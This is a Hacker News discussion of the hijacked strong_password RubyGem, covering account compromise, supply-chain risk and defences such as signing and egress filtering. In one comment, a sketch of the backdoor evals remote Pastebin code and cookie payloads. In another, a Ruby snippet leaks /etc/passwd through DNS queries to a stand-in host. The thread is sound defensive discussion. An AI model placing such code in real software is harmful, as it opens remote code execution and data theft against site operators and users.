
Strong_password Rubygem hijacked - jrochkind1
https://withatwist.dev/strong-password-rubygem-hijacked.html
======
bdmac97
Hi all. I'm the (actual) owner of that gem.

As already hypothesized in the comments, I'm pretty sure this was a simple
account hijack. The kickball user likely cracked an old password of mine,
from before I was using 1Password, that leaked in who knows which of the
various breaches that have occurred over the years.

I released that gem years ago and barely remembered even having a RubyGems
account, since I'm not doing much OSS work these days. As a result I simply
forgot to rotate out that old password, which is definitely my bad.

Since being notified and regaining ownership of the gem I've:

1\. Removed the kickball gem owner. I don't know why RubyGems did not do this
automatically, but they did not.

2\. Reset to a new strong password specific to rubygems.org (haha) with
1Password and secured my account with MFA.

3\. Released a new version 0.0.8 of the gem so that anyone who unfortunately
installed the bogus (now yanked) 0.0.7 version will hopefully update to the
new/real version of the gem.

~~~
confiq
One more reason to use a password manager and a unique password per site.

Thanks for sharing the info!

------
nneonneo
This is a gem that checks the strength of a user-submitted password. It has a
large number of downloads (37,000 on the legitimate 0.0.6 version), and it
looks like it's meant to be integrated into web servers.

The modified gem downloaded and executed code stored in an editable Pastebin
paste, meaning the code could have changed at any time. Presumably, the
malicious code would activate just by browsing any page on an affected site.
One version of the Pastebin code would execute arbitrary code embedded in a
magic cookie sent by a client. Plus, it would ping the attacker's server to
let them know your web server was infected.
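
To make the mechanics concrete, here's a sketch of that pattern as described
above (an illustration, not the actual payload; the paste URL and cookie name
are stand-ins):

    # Stage 1, hidden in the gem: fetch attacker-controlled code from a
    # mutable paste and eval it in a background thread.
    require "net/http"

    Thread.new do
      eval Net::HTTP.get(URI("https://pastebin.com/raw/XXXXXXXX"))
    end

    # Stage 2, served from the paste: a Rack middleware that evals whatever
    # a client sends in a magic cookie, on any request to the site.
    require "rack"

    class Backdoor
      def initialize(app)
        @app = app
      end

      def call(env)
        payload = Rack::Request.new(env).cookies["__evil"]  # stand-in name
        eval(payload) if payload
        @app.call(env)
      end
    end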

Nasty, nasty stuff.

~~~
pharrington
> This is a gem that checks the strength of a user-submitted password

Does it, though?

[https://github.com/bdmac/strong_password/blob/master/lib/str...](https://github.com/bdmac/strong_password/blob/master/lib/strong_password/entropy_calculator.rb)

~~~
fasterdom
Indeed, replacing this with the list of top 100 passwords would be much more
effective.

~~~
cyphar
Or, alternatively, switching to the haveibeenpwned API[1] or zxcvbn[2].

[1]: [https://haveibeenpwned.com/API/v2](https://haveibeenpwned.com/API/v2)
[2]: [https://github.com/dropbox/zxcvbn](https://github.com/dropbox/zxcvbn)
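
For example, a minimal sketch of a haveibeenpwned check via the range
endpoint, which keeps the k-anonymity property (only the first five hex
characters of the password's SHA-1 ever leave your machine):

    require "digest"
    require "net/http"

    # Returns how many times the password appears in known breaches.
    def pwned_count(password)
      sha1   = Digest::SHA1.hexdigest(password).upcase
      prefix = sha1[0, 5]
      suffix = sha1[5..-1]
      body   = Net::HTTP.get(URI("https://api.pwnedpasswords.com/range/#{prefix}"))
      hit    = body.each_line.find { |line| line.start_with?(suffix) }
      hit ? hit.chomp.split(":").last.to_i : 0
    end

    puts pwned_count("password1")  # large count: reject this password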

------
MrStonedOne
The unanswered question is still how this `kickball` account gained control of
the gem.

> The gem seems to have been pulled out from under me… When I login to
> rubygems.org I don’t seem to have ownership now. Bogus 0.0.7 release was
> created 6/25/2019.

The way I see it, there are a few options:

1\. The gem was transferred to this account by RubyGems staff.

2\. The maintainer's account was hijacked and then it was transferred, and
could even still be compromised.

3\. There is some bug or attack vector in RubyGems itself that allowed the
attacker to gain control.

Any guesses?

~~~
zbentley
Option 2 is overwhelmingly likely, IMO. Phishing, password reuse, credential
scraping/spamming, and plain old brute force are unbelievably common.

That said, the other two options bear investigation too. Just don't spend time
looking for a cold breeze from an un-caulked window frame when the screen door
is open.

~~~
saurik
The true irony, of course, is that the package in question is designed to
help prevent people from reusing common passwords or choosing passwords that
are easy to brute force (whether it does that well or not isn't the point,
though I guess if it isn't very good then this becomes all the more humorous)
;P... Clearly the author should have used this package to select the password
that protected the uploads of this package.

~~~
viraptor
We don't know that. Their system could've been compromised in some other way
and the password captured.

------
fasterdom
We need some sort of capability and permission system for libraries.

For example, a "strong_password" library should only be given "CPU compute"
permissions, no I/O.

But even with this, the problem will be the same one we see on phones:
popular libraries will request all the permissions.

You'll want to install React, and React plus its 100 dependencies will request
everything.

~~~
kibwen
To be honest, even the coarsest-possible permissions of "can do I/O" vs.
"can't do I/O" would be exceedingly effective at stymieing these sorts of
attacks; all malicious software of this sort needs to do I/O at some point,
and relatively few libraries actually have a good excuse to do I/O (though
logging might be thorny).

That said, it seems easier said than done to impose those sorts of
restrictions on a per-dependency basis. Attempting to statically verify the
absence of I/O sounds like a great game of whack-a-mole, and I don't know how
you'd do it dynamically without running all non-I/O dependencies in an
entirely separate process from the main program.

~~~
redsymbol
> few libraries actually have a good excuse to do I/O (though logging might be
> thorny).

Yeah, logging would be tricky...

Maybe a "logging" capability could be created, separate from other I/O.

Such a capability would be weird, nonstandard, and messy, cutting across
several abstraction layers. But if pulled off, it might be worth the effort.

~~~
viraptor
That's solved in similar frameworks by separating open from read/write. You
open (or inherit from somewhere) a logging socket, drop the open privileges,
and retain the permission to write to the log socket.
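
In Ruby terms, a sketch of that open-then-drop pattern (assuming the
third-party "pledge" gem, which wraps OpenBSD's pledge(2); the exact gem API
is an assumption on my part):

    require "pledge"  # assumed third-party gem binding pledge(2)

    log = File.open("/var/log/app.log", "a")  # acquire the descriptor up front

    # Drop the ability to open anything new: "stdio" keeps read/write on
    # descriptors we already hold, while further open(2)/socket(2) calls
    # terminate the process.
    Pledge.pledge("stdio")

    log.puts "this write is still permitted"
    File.open("/etc/passwd")  # this would now be fatal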

~~~
masklinn
This discussion is basically inventing a per-library pledge(2).

~~~
viraptor
Or AppArmor, SELinux, grsec, TOMOYO, ... But those systems can't handle a
scripting language's per-library use case without some serious thread/IPC
overhead.

~~~
masklinn
These others can achieve what's intended, but the entire flavour of the
discussion is a dead ringer for pledge's purpose and interface, which is much
simpler and very much internal to the software (a self-check of sorts).

------
westoque
In light of vulnerabilities like these, I'm glad there are developers who
spend time making their apps more secure, and who make the rest of us aware
that issues like these are out there. Security is almost always put off in
exchange for features, and most of the time it's taken for granted. It's
about time we start taking it seriously.

Kudos to you!

------
frizkie
It seems to me like the only way to really provide any sense of security is to
force gems uploaded to RubyGems to be signed. There is some discussion here
([https://github.com/rubygems/guides/pull/70](https://github.com/rubygems/guides/pull/70))
about why the RubyGems PGP CA isn't really worth using in its current state.
As we've seen with JavaScript dependencies, we can only put off dealing with
this problem for so long.

~~~
javagram
Another solution would be changing the ecosystem to no longer be reliant on so
many third party dependencies.

For instance, if I am using Java and build my web app with only Spring
Framework, I can have a lot more confidence that one of my JARs hasn't been
backdoored than I can in an ecosystem where it's regular practice to pull
hundreds of dependencies from different individual FOSS developers, and where
it's difficult to audit the process each library author uses to secure their
package-manager upload credentials.

I am not sure signatures are that useful since without a centralized authority
to issue the certificates and securely verify author identities, we are just
back to a trust-on-first-use policy for the signatures, and people will just
end up setting their CI servers to always trust new signatures since they
won’t want to deal with what happens when authors change their certificate
from version to version (which will surely happen).

~~~
msbarnett
Sure, obviously reinventing as many wheels as possible will minimize your
exposure to third-party malfeasance.

As in all forms of engineering there are, of course, no absolutes, only trade-
offs to be made.

The more wheels you reinvent, the slower your velocity for solving the core
business problems that pay your bills. Moving too slowly can be fatal to the
business. It’s a tricky balance. Signing isn’t perfect, but it can improve
some aspects of some balances people strike.

~~~
PeterisP
It's not about the amount of functionality shifted to dependencies, but about
the fragmentation of those dependencies.

Packaging and distributing libraries properly takes effort, so it only gets
done properly when it's sufficiently centralized. If you have to import fifty
third-party wheels, it's unavoidable that some or most of those wheels won't
be managed properly; but it's quite feasible to have a single (or three)
well-managed third-party package that provides a hundred wheels so you don't
have to reinvent them. If the strong_password gem were integrated into (for
example) Rails and managed/released by the same team with the same processes,
this risk would have been avoided. If, instead of a dozen separate gems each
providing one piece of functionality, you had a single bundle of varied
functionality, like Guava or Apache Commons in Java, that bundle could handle
release management in a way that each separate gem developer cannot.

If you want reliable dependencies, you either have to choose _only_
dependencies with bureaucratic and pedantic release governance, or
manage/audit each dependency yourself (as the author of the original article
seems to have done). In ecosystems where it's reasonable for serious projects
to have 0-3 distinct (but large) external dependencies, this works easily; in
ecosystems where you have dozens or even hundreds of dependencies, that
overhead is impractical for most projects.

~~~
zbentley
> If you want reliable dependencies, you either have to choose only
> dependencies with bureaucratic and pedantic release governance, or
> manage/audit each dependency yourself

That's a false dichotomy. There are middle grounds which can and do work at
scale:

Upgrade knowingly and deliberately (don't just spray greenkeeper everywhere).

Carefully monitor changed application/network behavior after upgrades.

Devote a manageable, non-zero amount of time to reading/finding security
bulletins or security incidents on your most-heavily-used dependencies.

Pay attention to issue reports and prioritize any with possible security
implications.

...and (at a slightly larger scale) hire, empower, and compensate people to do
those kinds of things in a systematic, regular way.

Seriously, security engineering isn't served well by "ZOMG NPM is garbage we
must switch to $megaframework and pray that their release engineers get
everything right" hysteria and absolutism. There are effective, moderate
strategies that help with these issues every day.

~~~
javagram
I think we can simplify that middle ground proposal down to two items:

1) only upgrade dependencies “knowingly and deliberately” (as the author of
this article did). What does this mean if not auditing the upgrades? Just
upgrading more rarely (e.g. because you know you need a specific feature or
bug fix), but still auditing them? By waiting to upgrade, the diff will be
vastly larger and performing an audit to “knowingly” upgrade will be much more
difficult.

2) detecting a breach after you’ve already installed an attacker’s code onto
your servers, via active monitoring or by hoping someone else does active
monitoring or auditing and reports the issue to you or to a central authority.

#1 as a “middle ground” doesn’t seem too different from the post you responded
to. #2 is what most projects seem to rely on - hope someone else finds the
problem and reports it, and that they don’t get hit too hard in the meantime.

------
oomkiller
There's still a lot to learn about this incident, but most likely the RubyGems
account was compromised, allowing the attacker to upload whatever they wanted.
Signed releases with a web of trust would be ideal, but I doubt we'll ever see
that world. A simple and pragmatic solution would be for the next version of
bundler to support installing only packages published with two-factor auth
enabled, and for the next major Rails version to default that to on, with
plenty of advance warning in 6.x/bundler. This still has plenty of gaps, such
as an attacker taking over an account even with two-factor enabled and then
re-enabling it with their own keys, or rubygems.org itself being compromised.
But it would still represent a major upgrade in security for the entire Ruby
ecosystem without causing much pain to authors and users.

------
hiccuphippo
Reminds me of this article: [https://hackernoon.com/im-harvesting-credit-card-numbers-and...](https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5)

------
jlmorton
This is a great reason why you should never allow unknown outgoing connections
from production.

You can implement this however makes sense for you. For me, the easiest thing
is to run a simple locked-down proxy server and allow only specific domains
there. This makes it easy to set up whatever rules you want, allowing entire
domains or only specific hosts. And it gives you a convenient place to log
entries before you lock them down.

This is also why you shouldn't allow external DNS resolution from every host
in your network. It would be just as easy to move data in and out with
Dnsruby::Resolver.query('base64-encoded-payload.badhost.com', 'TXT'), 255
bytes at a time.

Once everything is moving through your proxy, there's no need to allow
external DNS resolution from other hosts.
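
For illustration, the same channel using nothing but the standard library
(badhost.com standing in for a domain whose authoritative nameserver the
attacker controls):

    require "base64"
    require "resolv"

    # The attacker's nameserver logs every query name it receives, so the
    # secret travels out in the lookups themselves; no TCP channel needed.
    secret   = File.read("/etc/passwd")
    encoded  = Base64.urlsafe_encode64(secret).delete("=")
    resolver = Resolv::DNS.new

    # DNS labels max out at 63 bytes and full names at ~253, so chunk.
    encoded.scan(/.{1,63}/).each_slice(3).with_index do |labels, i|
      name = "#{i}.#{labels.join('.')}.badhost.com"
      resolver.getresources(name, Resolv::DNS::Resource::IN::TXT) rescue nil
    end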

~~~
zelon88
If an attacker has the ability to send dig queries to a remote host, he can
override anything you put in place on the host to prevent external DNS
queries.

Also, most of this traffic is still unencrypted, and dig'ing strange servers
is noisy as hell. I'm pretty sure (famous last words) that most entry-level
firewalls would flag this out of the box. If they don't, they should.

Still upvoted you though. This is an exfiltration technique that is really
easy to spot and not widely known about.

~~~
jlmorton
Right, worry about outgoing traffic first and DNS resolution second. And this
goes for all traffic; even ICMP can be used to tunnel data.

------
hirundo
> I went line by line linking to each library’s changeset. This due diligence
> never reported significant surprises to me, until this time.

Mad props to the author, Tute Costa, for doing this. It's a large investment
of time for usually no return, so I think very few people do it. And his (?)
reaction to finding this was quite effective.

Thank you for your service, sir.

------
ioquatix
If you have time and/or money and want to contribute to fixing this issue,
please feel free to join in:
[https://github.com/rubygems/rubygems/issues/2496](https://github.com/rubygems/rubygems/issues/2496)

------
sudhirj
The way I see it, the root of the problem is that there isn't an independently
verifiable association between a package and the code commit hash it was
generated from. My GitHub page can have good code, but no one has any idea
what's in the corresponding package.

Does the upcoming built-in package manager on GitHub solve this problem? Does
it guarantee that packages are only built from code pushed to GitHub, and does
it associate the commit hash in the metadata in some way?
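
Until something like that exists, you can at least check the association by
hand; a rough sketch (the tag name below is an assumption, and many gems don't
tag releases at all):

    # Fetch and unpack exactly what rubygems.org serves...
    gem fetch strong_password --version 0.0.6
    gem unpack strong_password-0.0.6.gem

    # ...then diff it against the corresponding tag in git.
    git clone https://github.com/bdmac/strong_password
    git -C strong_password checkout v0.0.6   # assumed tag name
    diff -r strong_password strong_password-0.0.6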

------
huxflux
RubyGems should contract an external auditor (a security firm); this could go
way deeper. Until they perform a thorough audit I will personally stay away
from this project.

~~~
FDSGSG
So why does this not apply to everything?

If "this could go way deeper" is your answer to a super unpopular rubygem
getting hijacked, why isn't that just the default assumption then?

Do you only use thoroughly audited software projects? How do you manage that?

------
1337shadow
We really need more signing support in language-specific packaging.

------
Papirola
Why not just restrict the production environment so that it can't open ports
other than 80 and can't create TCP connections to unauthorized hosts?

~~~
acdha
It’s effective, but it tends to be a considerable amount of work to maintain,
especially since the web is more dynamic these days: imagine what it would
take to filter only authorized connections to a service hosted on AWS, for
example, where anyone in the world can get IPs in the possible range and can
even put data on whitelisted hostnames like S3. You’re basically building an
allow list of hostnames, intermediating every update path, etc., and dealing
with things that were designed for a more open model (e.g. do you disable
things like OCSP, or whitelist more third-party resources?).

This also heavily encourages microservices, since most non-trivial
applications will have some reason to connect to fairly arbitrary resources.
Hopefully those can be sandboxed well, but relatively few apps were designed
that way, and the general class of things that weren’t supposed to work but do
is notoriously easy for even experienced teams to miss.

